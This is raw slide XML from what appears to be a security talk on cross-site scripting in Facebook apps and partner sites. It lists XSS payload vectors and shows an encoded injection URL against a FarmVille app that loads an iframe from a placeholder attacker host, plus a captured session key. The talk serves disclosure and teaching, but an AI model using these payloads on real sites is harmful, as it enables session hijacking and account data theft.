        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3048118" y="4368712"/>
          <a:ext cx="1140860" cy="570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a</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0">
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3048118" y="4368712"/>
        <a:ext cx="1140860" cy="5704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A2F73A-5B84-49E6-8CFC-F7DB655DC098}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="6606540" cy="1531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onsolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://apps.facebook.com/onthefarm/index.php?type=...</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="5043521" cy="1531620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{139B2B02-E256-4C8D-9278-454CA7DACCD2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="582929" y="1786890"/>
          <a:ext cx="6606540" cy="1531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onsolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://fbpr1-proxy.farmville.zynga.com/current/index.php?type=...</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_user</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=1077687516</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_session_key</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" spc="-110" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>2.RUylEaZ4VgDp9xJ8HpHcrQ__.3600.1271307600-1077687516</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_ss</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=RUylEaZ4VgDp9xJ8HpHcrQ__</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig_api_key</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>=80c6ec6628efd9a465dd223190a65bbc</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> &amp;</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>fb_sig</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>_...</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="582929" y="1786890"/>
        <a:ext cx="5028057" cy="1531620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E0C8B0C-0B79-4F34-B9DE-50AC176B0366}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1165859" y="3573780"/>
          <a:ext cx="6606540" cy="15316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onsolas" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> http://EVILURI/</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1165859" y="3573780"/>
        <a:ext cx="5028057" cy="1531620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{391531A1-0615-4C86-8FF4-A150B1D87772}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5610987" y="1161478"/>
          <a:ext cx="995553" cy="99555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610987" y="1161478"/>
        <a:ext cx="995553" cy="995553"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F5E6A67-3134-4C25-BB0E-5AB01B5A6A8D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6193917" y="2938157"/>
          <a:ext cx="995553" cy="99555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93917" y="2938157"/>
        <a:ext cx="995553" cy="995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F25CA5-90F7-4EA4-82F6-69F73B29BB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5029200"/>
            <a:ext cx="8686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86450"/>
            <a:ext cx="8686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F053EE-DFE0-452E-A149-EB1E468F8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E126-7157-4D3C-BA7B-629F9968C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D2198-A2A7-4D6F-AE0A-682C74BC6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E4369-C9C2-49E3-9739-0F267B0D7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5A0D5-E42F-4D52-96BC-CF1256813E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7A639-59FE-40DA-BE14-55E88BC69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E5E71-E789-4828-B160-EE4318D52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C80E-2C82-4208-AC3A-6B889A96AA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8C21B-C22C-4626-8B24-8A90E7FF2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B293-983C-4AEE-93A0-7B09943A1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F409-B9EE-42B8-937E-696A766DD2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52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381000" y="12954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B9BA1B-4534-47C7-9D20-B432278951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5181600"/>
            <a:ext cx="852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kern="0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Cross-Site Scripting is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kern="0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Not Your Friend</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1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Same-origin policies block cross-domain access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Cookies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Inline frames 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iframe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400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/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en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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But with XSS, malicious scripts share the </a:t>
            </a:r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domain of the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> application (“cross-site”)</a:t>
            </a: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So What?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What if links (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&lt;a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) are allowed?</a:t>
            </a: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More Than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ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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6342063" cy="440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2895600"/>
            <a:ext cx="3733799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&lt;a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href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="Target URL" style="position:absolute;top:0px;left:0px; height:980px; width:1300px;"&gt;…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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What if images (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img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dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) are allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="16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Images still make HTTP requests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XSS is commonly used to launch CSRF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Can also be used for information leakage</a:t>
            </a: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More Than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ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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2000250"/>
            <a:ext cx="60388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What if inline frames (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iframe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dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) are allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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endParaRPr lang="en-US" sz="28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CSRF, UI redressing, phishing, etc.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More Than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ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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624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Also, JavaScript can appear in many places…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&lt;div style="width: expression(alert('XSS'));"&gt;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&lt;?xml-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stylesheet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javascript:alert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('XSS')"?&gt;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img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src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="http://site/404"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onerror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=alert('XSS');&gt;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&lt;link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rel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stylesheet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=data:,*%7bx:expression(alert('XSS'))%7d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&lt;object data="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data:text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/html;base64,PHNjcmlwdD5hbGVyd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CgxKTwvc2NyaXB0Pg=="&gt;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And let’s not forget browser plug-ins…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  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Flash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crossdomain.xml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  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Flash 0-days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  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malicious PDFs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More Than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ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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XSS-based proxies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Malware delivery on trusted sites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Browser exploitation frameworks (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/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en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keylogging</a:t>
            </a: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400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> integration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Apache breach: targeted XSS used to steal administrator credentials, get server access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Android Market: XSS allowed silent app installation and code execution on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>smartphones</a:t>
            </a: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Beyond the Browser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Many sites now use external JavaScript, JSON APIs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> widgets, and other tools to integrate content from other domains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One major example being…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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The Age of 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Mashups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13" y="3429000"/>
            <a:ext cx="66944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Hacking Facebook directly tends to be difficult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But Facebook apps…</a:t>
            </a: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The Age of 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Mashups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62758"/>
            <a:ext cx="6193420" cy="391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http://apps.facebook.com/superpokey/sp_invite_friends/?</a:t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success=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You+successfully+SuperPoke'd+your+friend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(s)!</a:t>
            </a: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Facebook Apps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45624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http://apps.facebook.com/superpokey/sp_invite_friends/?</a:t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success=test</a:t>
            </a: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Facebook Apps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138" y="2505075"/>
            <a:ext cx="46577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Meet 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theharmonyguy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371598"/>
          <a:ext cx="8534400" cy="487680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90800"/>
                <a:gridCol w="5943600"/>
              </a:tblGrid>
              <a:tr h="696686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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2001 – 2003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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Administrator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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> for an ASP Portal</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2003 – 2007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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Kennesaw State University</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2007 – 2009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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wake Forest University</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nov.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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 2007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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OpenSocial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Emote “Hack”</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jun. 2009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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SuperPoke</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> XSS Demo</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Oct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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. 2009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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Month of Facebook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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Bugs</a:t>
                      </a:r>
                      <a:endPara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 Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2010 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="F4F9FC"/>
                          </a:solidFill>
                          <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2009</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F4F9FC"/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Semibold" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gemini Security Solutions</a:t>
                      </a:r>
                      <a:endPara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Semibol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err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> app: insert script and go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Canvas app: Facebook filters code (FBML/FBJS)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JavaScript re-written to use fake DOM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Can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, but app runs on apps.facebook.com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But when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is from the app’s domain (e.g. fb.community.slide.com), Facebook will append API authorization parameters to the URL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Since the app is being loaded from the external domain, an XSS in the app means an XSS in the original source page</a:t>
            </a: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Facebook Apps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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://apps.facebook.com/onthefarm/index.php?type=%3Cfb%3Aiframe+src</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%2522http%253A%252F%252FEVILURI%252F%2522%253E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700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sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://apps.facebook.com/onthefarm/index.php?type="/&gt;&lt;fb:iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://fbpr1-proxy.farmville.zynga.com/current/index.php?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type=%22%2F%3E%3Ciframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700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sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://apps.facebook.com/onthefarm/index.php?type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="/&gt;&lt;fb:iframe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src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="http://fbpr1-proxy.farmville.zynga.com/current/index.php?</a:t>
            </a:r>
            <a:b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</a:b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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://EVILURI/"&gt;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Facebook Apps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Facebook Apps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7772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Jun. 2009: Proof-of-Concept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SuperPoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Worm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Harvested all profile information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Could send out links to friends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Nov. 2009: Month of Facebook Bugs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Almost 10,000 Facebook apps vulnerable to XSS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Over a dozen “Facebook Verified” apps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Six of the top ten apps by monthly active users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Feb. 2010: Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Autopwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Demo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Johnson/Wood)</a:t>
            </a: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Facebook Apps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Canvas apps now being deprecated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For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> apps or external sites, JavaScript is used to access Facebook APIs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XSS payloads can simply use these functions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Some site are now “instant personalization” partners – automatically authorized</a:t>
            </a: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Facebook Apps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  <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scribd</a:t>
            </a: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Instant Personalization Sites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24075"/>
            <a:ext cx="661828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613" y="4133850"/>
            <a:ext cx="65801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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trend: appending parameters to navigation links within the page</a:t>
            </a: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Instant Personalization Sites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  <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rotten Tomatoes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.rottentomatoes.com/m/live_free_or_die_hard/news/1648085/kevin_smith_on_hacker_duty_for_andquotdie_hard_4andquot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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2400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
